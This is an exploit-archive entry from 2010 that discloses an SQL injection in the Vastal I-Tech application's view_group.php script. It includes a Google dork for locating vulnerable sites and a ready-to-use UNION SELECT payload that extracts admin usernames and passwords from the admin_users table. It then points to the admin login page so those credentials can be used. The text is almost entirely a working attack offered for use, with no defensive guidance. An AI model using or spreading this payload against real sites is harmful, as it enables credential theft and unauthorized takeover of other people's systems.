[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Vastal I-Tech SQL Injection Vulnerability
# Published : 2010-06-02
# Author : HELLBOY
# Previous Title : Joomla Component ChronoForms (com_chronocontact)
# Next Title : SIMM Management System (SMS) Local File Inclusion Vulnerability
#######################################################
# IN THE NAME OF GOD
#
# Vastal I-Tech SQL Injection Vulnerability
#
# Author : HELLBOY
#
# Tested on Lunix
#
# CVE : N/A
#
# Email : A68.HELLBOY@GMAIL.COM
#
# Dork : inurl:"view_group.php?group_id="
########################################################
# Exploit :
# http://[site]/view_group.php?group_id={SQLI}
#
# EXAM: -1+union+select+group_concat(admin_user,0x3a,admin_password)+from+admin_users--
#
# Admin login :
# http://www.[sitename].com/admin/
#########################################################
# Greetz :
# All members of the Forum WwW.ASHIYANE.ORG & WwW.pars-p30.iR
#
#########################################################